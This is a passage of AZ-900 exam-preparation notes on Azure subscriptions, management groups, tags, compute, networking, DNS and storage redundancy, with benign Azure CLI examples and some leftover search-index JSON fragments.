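When an account has multiple subscriptions, the Azure CLI can switch the active one. A small sketch (the subscription name is a placeholder):

```bash
# List the subscriptions the signed-in account can access
az account list --output table

# Make a specific subscription the default for subsequent commands
az account set --subscription "Development Subscription"
```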

        You can have up to 2000 role assignments in each subscription.

An Azure subscription has a trust relationship with Azure Active Directory (Azure AD): a subscription trusts Azure AD to authenticate users, services, and devices. Multiple subscriptions can trust the same Azure AD directory, but each subscription can only trust a single directory.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-groups-in-azure","title":"Management Groups in Azure","text":"

        To efficiently manage access, policies (like available regions), and compliance when you manage multiple Azure subscriptions, you can use Management Groups, because management groups provide scope that sits above subscriptions.

        When managing multiple subscriptions, you organize those subscriptions into containers called management groups, to which you can then apply governance conditions. All subscriptions within a management group will, in turn, inherit the conditions you apply to the management group.

        All subscriptions within a single management group must trust the same Azure AD tenant.

        The image below highlights how you can create a hierarchy for governance through the use of management groups:

        Some examples of how you could use management groups might be:

        • Create a hierarchy that applies a policy.
        • Provide user access to multiple subscriptions.

        Facts we need to know:

        • Maximum of 10,000 management groups supported in a single directory.
• A management group tree can support up to six levels of depth (root and subscription levels not included).
        • Each management group and subscription can support only one parent.
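A minimal sketch of creating a management group and moving a subscription under it with the Azure CLI (the names and subscription ID are placeholders):

```bash
# Create a management group and place a subscription under it
az account management-group create --name mg-production --display-name "Production"

az account management-group subscription add \
  --name mg-production \
  --subscription 00000000-0000-0000-0000-000000000000
```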
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tags","title":"Tags","text":"

        One way to organize related resources is to place them in their own subscriptions. You can also use resource groups to manage related resources. Resource tags are another way to organize resources. Tags provide extra information, or metadata, about your resources. A resource tag consists of a name and a value. You can assign one or more tags to each Azure resource. Keep in mind that you don't need to enforce that a specific tag is present on all of your resources.

Example tag names and values:

| Name | Value |
| --- | --- |
| AppName | The name of the application that the resource is part of. |
| CostCenter | The internal cost center code. |
| Owner | The name of the business owner who's responsible for the resource. |
| Environment | An environment name, such as "Prod," "Dev," or "Test." |
| Impact | How important the resource is to business operations, such as "Mission-critical," "High-impact," or "Low-impact." |

        How do I manage resource tags?

        You can add, modify, or delete resource tags through Windows PowerShell, the Azure CLI, Azure Resource Manager templates, the REST API, or the Azure portal.
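A small Azure CLI sketch of applying tags at creation time and replacing them on an existing resource (names, tags, and the resource ID lookup are placeholders):

```bash
# Tag a resource group at creation time
az group create --name rg-demo --location westeurope \
  --tags Environment=Dev Owner=alice CostCenter=1234

# Replace the tags on an existing resource by ID
RES_ID=$(az resource list --resource-group rg-demo --query "[0].id" --output tsv)
az resource tag --ids "$RES_ID" --tags Environment=Test
```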

        You can also use Azure Policy to enforce tagging rules and conventions.

        Resources don't inherit tags from subscriptions and resource groups, meaning that you can apply tags at one level and not have those tags automatically show up at a different level, allowing you to create custom tagging schemas that change depending on the level (resource, resource group, subscription, and so on).

        Limitations to tags:

• Not all resource types support tags.
• Maximum of 50 tags (for resource groups and resources).
  • Tag name length: 512 characters.
  • Tag value length: 256 characters.
• Maximum of 15 tags for storage accounts.
  • Tag name length: 128 characters.
  • Tag value length: 256 characters.
• VMs and VM scale sets: the total set of tag names and values is limited to 2,048 characters.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-compute-services-and-products","title":"Azure Compute services and products","text":"

        Azure compute is an on-demand computing service that organizations use to run cloud-based applications. It provides compute resources like disks, processors, memory, networking, and even operating systems. Azure supports many types of compute solutions, including Linux, Windows Server, SQL Server, Oracle, IBM, and SAP. Each Azure compute service offers different options depending on your requirements. The most common Azure compute services are:

        1. Azure Virtual Machines

          • VM Scale Sets
          • VM Availability Sets
        2. Azure Virtual Desktop

        3. Azure Container Instances

        4. Azure Functions (serverless computing)

        5. Azure Logic Apps (serverless computing)

        6. Azure App Service

        7. Azure Virtual Networking

        8. Azure Virtual Private Networks

        9. Azure ExpressRoute

        10. Azure DNS

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#1-azure-virtual-machines","title":"1. Azure Virtual Machines","text":"

        Virtual machines are virtual versions of physical computers that feature virtual processors, memory, storage, and networking resources. They host an operating system just like a physical computer, and you can install and run software on them just like a physical computer.

VMs provide IaaS. When you need total control over an operating system or environment, VMs are ideal, for example when running in-house or customized software.

        SLA for Virtual Machines

        • For all Virtual Machines that have two or more instances deployed across two or more Availability Zones in the same Azure region, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.99% of the time.

        • For all Virtual Machines that have two or more instances deployed in the same Availability Set or in the same Dedicated Host Group, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.95% of the time.

        • For any Single Instance Virtual Machine using Premium SSD or Ultra Disk for all Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.9%.

        • For any Single Instance Virtual Machine using Standard SSD Managed Disks for Operating System Disk and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.5%.

        • For any Single Instance Virtual Machine using Standard HDD Managed Disks for Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 95%.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-scale-sets","title":"Virtual Machine Scale Sets","text":"

        Azure can also manage the grouping of VMs for you with features such as scale sets and availability sets. A virtual machine scale set allows you to deploy and manage a set of identical VMs that you can use to deploy solutions with true autoscale. As demand increases, VM instances can be added.
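A minimal sketch of deploying a scale set with the Azure CLI (the image alias, instance count, and names are placeholders):

```bash
# Create a scale set with two identical Ubuntu instances
az vmss create \
  --resource-group rg-demo \
  --name vmss-demo \
  --image Ubuntu2204 \
  --instance-count 2 \
  --admin-username azureuser \
  --generate-ssh-keys
```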

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-availability-sets","title":"Virtual machine availability sets","text":"

Virtual machine availability sets are another tool to ensure that VMs stagger updates and have varied power and network connectivity, preventing you from losing all your VMs to a single network or power failure.

        Availability sets do this by grouping VMs in two ways: update domain and fault domain.

        • Update domain: The update domain groups VMs that can be rebooted at the same time.
        • Fault domain: The fault domain groups your VMs by common power source and network switch. By default, an availability set will split your VMs across up to three fault domains. This helps protect against a physical power or networking failure by having VMs in different fault domains.

        There\u2019s no additional cost for configuring an availability set. You only pay for the VM instances you create.
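A minimal sketch of creating an availability set with explicit fault and update domain counts (all names and values are placeholders):

```bash
# Spread VMs across 3 fault domains and 5 update domains
az vm availability-set create \
  --resource-group rg-demo \
  --name avset-demo \
  --platform-fault-domain-count 3 \
  --platform-update-domain-count 5
```

VMs are then placed into the set at creation time, e.g. with `az vm create ... --availability-set avset-demo`.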

When to use VMs:

• During testing and development.
• When running applications in the cloud.
• When extending your datacenter to the cloud.
• During disaster recovery.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#2-azure-virtual-desktop","title":"2. Azure Virtual Desktop","text":"

        Azure Virtual Desktop is a desktop and application virtualization service that runs on the cloud. It enables you to use a cloud-hosted version of Windows from any location. Azure Virtual Desktop provides centralized security management for users' desktops with Azure Active Directory (Azure AD). You can enable multifactor authentication to secure user sign-ins. You can also secure access to data by assigning granular role-based access controls (RBACs) to users. With Azure Virtual Desktop, the data and apps are separated from the local hardware. The actual desktop and apps are running in the cloud, meaning the risk of confidential data being left on a personal device is reduced. Azure Virtual Desktop lets you use Windows 10 or Windows 11 Enterprise multi-session, the only Windows client-based operating system that enables multiple concurrent users on a single VM.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#3-azure-container-instances","title":"3. Azure Container Instances","text":"

        Much like running multiple virtual machines on a single physical host, you can run multiple containers on a single physical or virtual host. Virtual machines appear to be an instance of an operating system that you can connect to and manage.

        VM vs Containers

A VM virtualizes the hardware, emulating a physical computer. Containers virtualize the operating system. Unlike virtual machines, you don't manage the operating system for a container. Containers are a virtualization environment. If you need complete control, use a VM. On the other hand, containers prioritize portability and performance.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-instances-aci","title":"Azure Container Instances (ACI)","text":"

Azure Container Instances offer the fastest and simplest way to run a container in Azure, without having to manage any virtual machines or adopt any additional services. Azure Container Instances are a platform as a service (PaaS) offering. Azure Container Instances allow you to upload your containers, and then the service runs the containers for you.
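A minimal sketch of running a public container image on ACI (the names and DNS label are placeholders; the sample image is Microsoft's hello-world demo):

```bash
# Run a container with a public IP and DNS label
az container create \
  --resource-group rg-demo \
  --name aci-demo \
  --image mcr.microsoft.com/azuredocs/aci-helloworld \
  --ports 80 \
  --dns-name-label aci-demo-12345

# Check its state and fully qualified domain name
az container show --resource-group rg-demo --name aci-demo \
  --query "{fqdn:ipAddress.fqdn,state:provisioningState}" --output table
```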

Azure Container Instances (ACI) versus Azure Kubernetes Service (AKS)

        For many organizations, containers have become the preferred way to package, deploy, and manage cloud apps.

        • Azure Container Instances (ACI) is the easiest way to run a container in Azure, without the need for any VMs or other infrastructure. You can use docker images.
        • However, if you require full container orchestration, Microsoft recommends Azure Kubernetes Service (AKS).
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-apps","title":"Azure Container Apps","text":"

        Azure Container Apps are similar in many ways to a container instance. They allow you to get up and running right away, they remove the container management piece, and they're a PaaS offering. Container Apps have extra benefits such as the ability to incorporate load balancing and scaling. These other functions allow you to be more elastic in your design.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-kubernetes-service-aks","title":"Azure Kubernetes Service (AKS)","text":"

        Azure Kubernetes Service (AKS) is a container orchestration service. An orchestration service manages the lifecycle of containers. When you're deploying a fleet of containers, AKS can make fleet management simpler and more efficient.

        AKS simplifies the deployment of a managed Kubernetes cluster in Azure by offloading the operational overhead to Azure. Since it\u2019s hosted, Azure handles the health monitoring and maintenance. The Kubernetes masters are managed by Azure, and you manage and maintain the agent nodes.

        It\u2019s important to note that AKS itself is free. You pay only for the agent nodes within your clusters, not for the masters.

You can deploy an AKS cluster using the Azure CLI, the Azure portal, Azure PowerShell, and template-driven deployment options (ARM templates, Bicep, Terraform).
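A minimal sketch of standing up a managed cluster with the Azure CLI and connecting kubectl to it (names and node count are placeholders):

```bash
# Create a two-node managed Kubernetes cluster (you pay only for the nodes)
az aks create \
  --resource-group rg-demo \
  --name aks-demo \
  --node-count 2 \
  --generate-ssh-keys

# Merge the cluster credentials into ~/.kube/config and verify
az aks get-credentials --resource-group rg-demo --name aks-demo
kubectl get nodes
```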

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#4-azure-functions-serverless-computing","title":"4. Azure Functions (serverless computing)","text":"

        Functions are a serverless technology that are best used in cases where you're concerned only about the code running your service and not the underlying platform or infrastructure.

        Azure Functions is an event-driven, serverless compute option that doesn\u2019t require maintaining virtual machines or containers. If you build an app using VMs or containers, those resources have to be \u201crunning\u201d in order for your app to function. With Azure Functions, an event wakes the function, alleviating the need to keep resources provisioned when there are no events.

Benefits:

• No infrastructure management: as a business, you don't have to focus on administrative tasks.
• Scalability.
• You only pay for what you use. Pricing is based on consumption: number of executions plus running time for each.

        Functions are commonly used when you need to perform work in response to an event (often via a REST request), timer, or message from another Azure service. Azure Functions runs your code when it's triggered and automatically deallocates resources when the function is finished. In this model, you're only charged for the CPU time used while your function runs. Functions can be either stateless or stateful. When they're stateless (the default), they behave as if they're restarted every time they respond to an event. When they're stateful (called Durable Functions), a context is passed through the function to track prior activity.

Generally, Azure Functions is stateless, but you can use an extension called Durable Functions to chain functions together and maintain their state while they execute.
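A hedged sketch of creating a function app on the serverless Consumption plan with the Azure CLI (names, runtime, and region are placeholders; a storage account is required):

```bash
# Function apps need a storage account for state and triggers
az storage account create \
  --name stfuncdemo12345 \
  --resource-group rg-demo \
  --location westeurope \
  --sku Standard_LRS

# Create the function app on the pay-per-execution Consumption plan
az functionapp create \
  --name func-demo-12345 \
  --resource-group rg-demo \
  --storage-account stfuncdemo12345 \
  --consumption-plan-location westeurope \
  --runtime node \
  --functions-version 4
```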

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#5-azure-logic-apps-serverless-computing","title":"5. Azure Logic Apps (serverless computing)","text":"

        When you need something more complex than Functions, like a workflow or a process, Azure Logic Apps is a good solution. It enables you to create no-code and low-code solutions hosted in Azure to automate and orchestrate tasks, business processes, and workflows.

        Implementation can be done using a web-based design environment. You build the app by connecting triggers to actions with various connections.

Pricing is based on consumption: the number of executions plus the type of connections that the app uses.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#6-azure-app-service","title":"6. Azure App Service","text":"

App Service is a compute platform that you can use to quickly build, deploy, and scale enterprise-grade web apps, background jobs, mobile back-ends, and RESTful APIs in the programming language of your choice (it supports multiple languages, including .NET, .NET Core, Java, Ruby, Node.js, PHP, and Python) without managing infrastructure (it also supports both Windows and Linux environments).

        App service is a PaaS offering. It offers automatic scaling and high availability. It enables automated deployments from GitHub, Azure DevOps, or any Git repo to support a continuous deployment model.

        App Service handles most of the infrastructure decisions you deal with in hosting web-accessible apps:

        • Deployment and management are integrated into the platform.
        • Endpoints can be secured.
        • Sites can be scaled quickly to handle high traffic loads.
        • The built-in load balancing and traffic manager provide high availability.
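A minimal sketch of provisioning a web app on App Service with the Azure CLI (the plan SKU, runtime string, and names are placeholder assumptions):

```bash
# A plan defines the compute; F1 is the free tier
az appservice plan create \
  --resource-group rg-demo \
  --name plan-demo \
  --sku F1 \
  --is-linux

# Create the web app on that plan with a Node.js runtime
az webapp create \
  --resource-group rg-demo \
  --plan plan-demo \
  --name webapp-demo-12345 \
  --runtime "NODE:18-lts"
```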
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#web-apps","title":"Web apps","text":"

        App Service includes full support for hosting web apps by using ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can choose either Windows or Linux as the host operating system.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#api-apps-azure-rest-api","title":"API apps (Azure Rest API)","text":"

        Much like hosting a website, you can build REST-based web APIs by using your choice of language and framework. You get full Swagger support and the ability to package and publish your API in Azure Marketplace. The produced apps can be consumed from any HTTP- or HTTPS-based client.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#webjobs","title":"WebJobs","text":"

        You can use the WebJobs feature to run a program (.exe, Java, PHP, Python, or Node.js) or script (.cmd, .bat, PowerShell, or Bash) in the same context as a web app, API app, or mobile app. They can be scheduled or run by a trigger. WebJobs are often used to run background tasks as part of your application logic.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#mobile-apps","title":"Mobile apps","text":"

        Use the Mobile Apps feature of App Service to quickly build a back end for iOS and Android apps. With just a few actions in the Azure portal, you can store mobile app data in a cloud-based SQL database; authenticate customers against common social providers, such as MSA, Google, Twitter, and Facebook; send push notifications; execute custom back-end logic in C# or Node.js.

        On the mobile app side, there's SDK support for native iOS and Android, Xamarin, and React native apps.

These capabilities describe the Azure mobile app, which lets you:

• Access, manage, and monitor Azure accounts and resources.
• Monitor the health and status of Azure resources, check for alerts, and diagnose and fix issues.
• Stop, start, and restart a web app or virtual machine.
• Run Azure CLI or Azure PowerShell commands to manage Azure resources.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor","title":"Azure Advisor","text":"

A free service that tracks your Azure consumption and offers recommendations, not only for cost savings but also for performance, reliability, and security.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates","title":"ARM templates","text":"

ARM templates allow you to declaratively describe the resources you want to use, using JSON format. The template will then create those resources in parallel. For example, if you need 25 VMs, all 25 will be created at the same time.
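A minimal sketch of deploying a template into a resource group with the Azure CLI (the template file and parameter are placeholders):

```bash
# Deployments are idempotent: re-running with the same template
# converges the group to the same declared state
az deployment group create \
  --resource-group rg-demo \
  --template-file azuredeploy.json \
  --parameters vmCount=25
```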

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#7-azure-virtual-networking","title":"7. Azure Virtual Networking","text":"

        Azure virtual networks and virtual subnets enable Azure resources, such as VMs, web apps, and databases, to communicate with each other, with users on the internet, and with your on-premises client computers.

        Azure virtual networking supports both public and private endpoints to enable communication between external or internal resources with other internal resources.

        • Public endpoints have a public IP address and can be accessed from anywhere in the world.
        • Private endpoints exist within a virtual network and have a private IP address from within the address space of that virtual network.

        It provides the following key networking capabilities:

        Isolation and segmentation: Azure virtual network allows you to create multiple isolated virtual networks. For name resolution, you can use the name resolution service that's built into Azure. You also can configure the virtual network to use either an internal or an external DNS server.

        Internet communications: You can enable incoming connections from the internet by assigning a public IP address to an Azure resource, or putting the resource behind a public load balancer.

        Communicate between Azure resources: Enable Azure resources to communicate securely with each other. Virtual networks can connect not only VMs but other Azure resources. Service endpoints let you connect to other Azure resource types, such as Azure SQL databases and storage accounts.

        Communicate with on-premises resources: Azure virtual networks enable you to link resources together in your on-premises environment and within your Azure subscription.

        • Point-to-site virtual private network connections are from a computer outside your organization back into your corporate network. In this case, the client computer initiates an encrypted VPN connection to connect to the Azure virtual network.
        • Site-to-site virtual private networks link your on-premises VPN device or gateway to the Azure VPN gateway in a virtual network. In effect, the devices in Azure can appear as being on the local network. The connection is encrypted and works over the internet.
        • Azure ExpressRoute provides dedicated private connectivity to Azure that doesn't travel over the internet. ExpressRoute is useful for environments where you need greater bandwidth and even higher levels of security.

        Route network traffic: By default, Azure routes traffic between subnets on any connected virtual networks, on-premises networks, and the internet. Route tables allow you to define rules about how traffic should be directed. Border Gateway Protocol (BGP) works with Azure VPN gateways, Azure Route Server, or Azure ExpressRoute to propagate on-premises BGP routes to Azure virtual networks.

        Filter network traffic: You can filter traffic between subnets.

        • Network security groups are Azure resources that can contain multiple inbound and outbound security rules. You can define these rules to allow or block traffic, based on factors such as source and destination IP address, port, and protocol.
        • Network virtual appliances are specialized VMs that can be compared to a hardened network appliance. A network virtual appliance carries out a particular network function, such as running a firewall or performing wide area network (WAN) optimization.

        Connect virtual networks: You can link virtual networks together by using virtual network peering. Peering allows two virtual networks to connect directly to each other. Network traffic between peered networks is private, and travels on the Microsoft backbone network, never entering the public internet. Peering enables resources in each virtual network to communicate with each other. These virtual networks can be in separate regions, which allows you to create a global interconnected network through Azure.

        User-defined routes (UDR) allow you to control the routing tables between subnets within a virtual network or between virtual networks. This allows for greater control over network traffic flow.
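        As a rough sketch of how these pieces are created, with hypothetical names throughout, a virtual network with one subnet can be built from the Azure CLI:

        ```bash
        # Hypothetical names; creates a vnet with a /16 address space and one /24 subnet
        az network vnet create \
          --resource-group my-rg \
          --name my-vnet \
          --address-prefixes 10.0.0.0/16 \
          --subnet-name frontend \
          --subnet-prefixes 10.0.1.0/24
        ```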

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#8-azure-virtual-private-networks","title":"8. Azure Virtual Private Networks","text":"

        A virtual private network (VPN) uses an encrypted tunnel within another network. VPNs are typically deployed to connect two or more trusted private networks to one another over an untrusted network (typically the public internet). Traffic is encrypted while traveling over the untrusted network to prevent eavesdropping or other attacks. VPNs can enable networks to safely and securely share sensitive information.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-vpn-gateway-instances","title":"Azure VPN Gateway instances","text":"

        Azure VPN Gateway instances are deployed in a dedicated subnet of the virtual network and enable the following connectivity:

        • Connect on-premises datacenters to virtual networks through a site-to-site connection.
        • Connect individual devices to virtual networks through a point-to-site connection.
        • Connect virtual networks to other virtual networks through a network-to-network connection.

        When setting up a VPN gateway, you must specify the type of VPN - either policy-based or route-based:

        • Policy-based VPN gateways statically specify the IP addresses of packets that should be encrypted through each tunnel. This type of device evaluates every data packet against those sets of IP addresses to choose the tunnel that packet is going to be sent through.
        • In route-based gateways, IPSec tunnels are modeled as a network interface or virtual tunnel interface. IP routing (either static routes or dynamic routing protocols) decides which one of these tunnel interfaces to use when sending each packet. Route-based VPNs are the preferred connection method for on-premises devices because they're more resilient to topology changes such as the creation of new subnets.

        Use a route-based VPN gateway if you need any of the following types of connectivity:

        • Connections between virtual networks
        • Point-to-site connections
        • Multisite connections
        • Coexistence with an Azure ExpressRoute gateway
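        A minimal sketch of creating a route-based gateway from the Azure CLI, assuming hypothetical names, that the vnet already contains a subnet named GatewaySubnet, and that a public IP resource already exists:

        ```bash
        # Hypothetical names; gateway deployment typically takes 30+ minutes
        az network vnet-gateway create \
          --resource-group my-rg \
          --name my-vpn-gateway \
          --vnet my-vnet \
          --public-ip-address my-gateway-ip \
          --gateway-type Vpn \
          --vpn-type RouteBased \
          --sku VpnGw1
        ```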

        There are a few ways to maximize the resiliency of your VPN gateway:

        Active/standby: By default, VPN gateways are deployed as two instances in an active/standby configuration, even if you only see one VPN gateway resource in Azure. When planned maintenance or unplanned disruption affects the active instance, the standby instance automatically assumes responsibility for connections without any user intervention.

        Active/active: With the introduction of support for the BGP routing protocol, you can also deploy VPN gateways in an active/active configuration. In this configuration, you assign a unique public IP address to each instance. You then create separate tunnels from the on-premises device to each IP address.

        ExpressRoute failover: Another high-availability option is to configure a VPN gateway as a secure failover path for ExpressRoute connections. ExpressRoute circuits have resiliency built in. However, they aren't immune to physical problems that affect the cables delivering connectivity or outages that affect the complete ExpressRoute location.

        Zone-redundant gateways: In regions that support availability zones, VPN gateways and ExpressRoute gateways can be deployed in a zone-redundant configuration. This configuration brings resiliency, scalability, and higher availability to virtual network gateways. These gateways require different gateway stock keeping units (SKUs) and use Standard public IP addresses instead of Basic public IP addresses.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#9-azure-expressroute","title":"9. Azure ExpressRoute","text":"

        Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection, with the help of a connectivity provider. This connection is called an ExpressRoute circuit. Each connection between Microsoft cloud services (such as Microsoft Azure and Microsoft 365) and your offices, datacenters, or other facilities requires its own ExpressRoute circuit.

        ExpressRoute connections don't go over the public Internet. ExpressRoute is a private connection from your on-premises infrastructure to your Azure infrastructure. Even if you have an ExpressRoute connection, DNS queries, certificate revocation list checking, and Azure Content Delivery Network requests are still sent over the public internet.

        ExpressRoute offers the following benefits:

        • Connectivity to Microsoft cloud services across all regions in the geopolitical region.
        • Global connectivity to Microsoft services across all regions with ExpressRoute Global Reach.
        • Dynamic routing between your network and Microsoft via Border Gateway Protocol (BGP).
        • Built-in redundancy in every peering location for higher reliability.

        ExpressRoute enables direct access to the following services in all regions:

        • Microsoft Office 365
        • Microsoft Dynamics 365
        • Azure compute services, such as Azure Virtual Machines
        • Azure cloud services, such as Azure Cosmos DB and Azure Storage
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#features","title":"Features","text":"

        Global connectivity: For example, say you had an office in Asia and a datacenter in Europe, both with ExpressRoute circuits connecting them to the Microsoft network. You could use ExpressRoute Global Reach to connect those two facilities, allowing them to communicate without transferring data over the public internet.

        Dynamic routing: ExpressRoute uses BGP to exchange routes between on-premises networks and resources running in Azure. This protocol enables dynamic routing between your on-premises network and services running in the Microsoft cloud.

        Built-in redundancy: Each connectivity provider uses redundant devices to ensure that connections established with Microsoft are highly available. You can configure multiple circuits to complement this feature.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#expressroute-connectivity-models","title":"ExpressRoute connectivity models","text":"

        ExpressRoute supports four models that you can use to connect your on-premises network to the Microsoft cloud:

        Co-location at a cloud exchange: Your datacenter, office, or other facility is physically co-located at a cloud exchange, such as an ISP. In this case, you can request a virtual cross-connect to the Microsoft cloud.

        Point-to-point Ethernet connection: A point-to-point Ethernet link connects your facility directly to the Microsoft cloud.

        Any-to-any networks: With any-to-any connectivity, you can integrate your wide area network (WAN) with Azure by providing connections to your offices and datacenters. Azure integrates with your WAN connection to provide a connection like you would have between your datacenter and any branch offices.

        Directly from ExpressRoute sites: You can connect directly into Microsoft's global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100-Gbps or 10-Gbps connectivity, which supports active/active connectivity at scale.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#10-azure-dns","title":"10. Azure DNS","text":"

        Azure DNS is a hosting service for DNS domains that provides name resolution by using Microsoft Azure infrastructure. By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. Azure DNS can manage DNS records for your Azure services and provide DNS for your external resources as well. Applications that require automated DNS management can integrate with the service by using the REST API and SDKs.

        Azure DNS is based on Azure Resource Manager, which provides features such as:

        • Azure role-based access control (Azure RBAC) to control who has access to specific actions for your organization.
        • Activity logs to monitor how a user in your organization modified a resource or to find an error when troubleshooting.
        • Resource locking to lock a subscription, resource group, or resource. Locking prevents other users in your organization from accidentally deleting or modifying critical resources.

        Azure DNS also supports private DNS domains. This feature allows you to use your own custom domain names in your private virtual networks, rather than being stuck with the Azure-provided names.

        Azure DNS also supports alias record sets. You can use an alias record set to refer to an Azure resource, such as an Azure public IP address, an Azure Traffic Manager profile, or an Azure Content Delivery Network (CDN) endpoint.

        You can't use Azure DNS to buy a domain name. For an annual fee, you can buy a domain name by using App Service domains or a third-party domain name registrar. Once purchased, your domains can be hosted in Azure DNS for record management.
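        A short sketch of hosting a zone and adding a record, with a hypothetical domain and address:

        ```bash
        # Hypothetical zone and record; creates a public DNS zone, then an A record www -> 203.0.113.10
        az network dns zone create --resource-group my-rg --name example.com
        az network dns record-set a add-record \
          --resource-group my-rg \
          --zone-name example.com \
          --record-set-name www \
          --ipv4-address 203.0.113.10
        ```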

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services","title":"Azure Storage Services","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#intro","title":"Intro","text":"

        A storage account provides a unique namespace for your Azure Storage data that's accessible from anywhere in the world over HTTP or HTTPS. Data in this account is secure, highly available, durable, and massively scalable. When you create your storage account, you'll start by picking the storage account type. The type of account determines the storage services and redundancy options and has an impact on the use cases.

        Type | Supported services | Redundancy options | Usage
        ---- | ------------------ | ------------------ | -----
        Standard general-purpose v2 | Blob Storage (including Data Lake Storage), Queue Storage, Table Storage, and Azure Files | LRS, GRS, RA-GRS, ZRS, GZRS, RA-GZRS | Standard storage account type for blobs, file shares, queues, and tables. Recommended for most scenarios using Azure Storage. If you want support for network file system (NFS) in Azure Files, use the premium file shares account type.
        Premium block blobs | Blob Storage (including Data Lake Storage) | LRS, ZRS | Premium storage account type for block blobs and append blobs. Recommended for scenarios with high transaction rates, or that use smaller objects or require consistently low storage latency.
        Premium file shares | Azure Files | LRS, ZRS | Premium storage account type for file shares only. Recommended for enterprise or high-performance scale applications. Use this account type if you want a storage account that supports both Server Message Block (SMB) and NFS file shares.
        Premium page blobs | Page blobs only | LRS | Premium storage account type for page blobs only.

        Some acronyms here:

        • Locally redundant storage (LRS)
        • Geo-redundant storage (GRS)
        • Read-access geo-redundant storage (RA-GRS)
        • Zone-redundant storage (ZRS)
        • Geo-zone-redundant storage (GZRS)
        • Read-access geo-zone-redundant storage (RA-GZRS)

        Storage account endpoints:

        The following table shows the endpoint format for Azure Storage services.

        Storage service | Endpoint
        --------------- | --------
        Blob Storage | https://<storage-account-name>.blob.core.windows.net
        Data Lake Storage Gen2 | https://<storage-account-name>.dfs.core.windows.net
        Azure Files | https://<storage-account-name>.file.core.windows.net
        Queue Storage | https://<storage-account-name>.queue.core.windows.net
        Table Storage | https://<storage-account-name>.table.core.windows.net

        Other data for the exam:

        • Maximum capacity for storage accounts: 5 PB.
        • Number of storage accounts per region per subscription: 250.
        • Maximum number of virtual network rules and IP network rules allowed per storage account in Azure: 200.
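        As a sketch with hypothetical names, the account type and redundancy from the table above map to the --kind and --sku flags when creating an account:

        ```bash
        # Hypothetical names; creates a standard general-purpose v2 account with LRS redundancy
        az storage account create \
          --name mystorageacct12345 \
          --resource-group my-rg \
          --location westeurope \
          --kind StorageV2 \
          --sku Standard_LRS
        ```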
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-redundancy","title":"Azure storage redundancy","text":"

        Data in an Azure Storage account is always replicated three times in the primary region. Azure Storage offers two options for how your data is replicated in the primary region, locally redundant storage (LRS) and zone-redundant storage (ZRS).

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-primary-region","title":"Redundancy in the primary region","text":"

        Locally redundant storage (LRS)

        Locally redundant storage (LRS) replicates your data three times within a single data center in the primary region. LRS provides at least 11 nines of durability (99.999999999%) of objects over a given year. LRS is the lowest-cost redundancy option and offers the least durability compared to other options. LRS protects your data against server rack and drive failures. However, if a disaster such as fire or flooding occurs within the data center, all replicas of a storage account using LRS may be lost or unrecoverable. To mitigate this risk, Microsoft recommends using zone-redundant storage (ZRS), geo-redundant storage (GRS), or geo-zone-redundant storage (GZRS).

        Zone-redundant storage (ZRS)

